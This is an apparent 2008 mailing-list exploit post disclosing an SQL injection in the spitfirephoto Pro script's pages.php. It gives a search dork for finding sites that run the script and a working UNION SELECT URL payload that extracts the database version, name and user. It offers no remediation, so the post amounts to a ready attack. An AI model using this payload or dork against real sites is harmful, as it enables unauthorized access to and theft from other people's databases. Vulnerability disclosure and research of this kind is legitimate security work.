Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Aria-Security.com: Saba 2.0 Cross Site Scripting [PASSIVE]

PHP-Nuke  Module  BookCatalog (category&cat id) Remote SQL injection Vulnerability

IranMC  ( detail.php?Kala ) Remote SQL injection Vulnerability

PHP-Nuke Module Sectionsnew (printpage&ar tid) Remote SQL injection Vulnerability

From:	beenudel1986_(at)_gmail.com <beenudel1986_(at)_gmail.com>
Date:	01.11.2008
Subject:	spitfirephoto Pro pages.php Sql Injection

################################################################
#
# Author: Beenu Arora
#
# Home  : www.BeenuArora.com
#
# Email : beenudel1986@gmail.com
#
# Share the c0de!
#
################################################################
#
# Title: spitfirephoto Pro pages.php Sql Injection

#
# Vendor: http://http://www.spitfirephoto.com/ ( Paid Script )

#
#
###########################################################
#
# d0rk:Powered by Spitfire Photo Pro
#
###########################################################

       
    
    Live Demo:
      
http://localhost/sapientphoto/pages.php?pageId=6634+and+1=2+union+select+1,2,3,4,
5,6,concat(version(),0x3a,database(),0x3a,
user())--

    

###########################################################
#
#  Bug discovered : 30 Oct.2008
###########################################################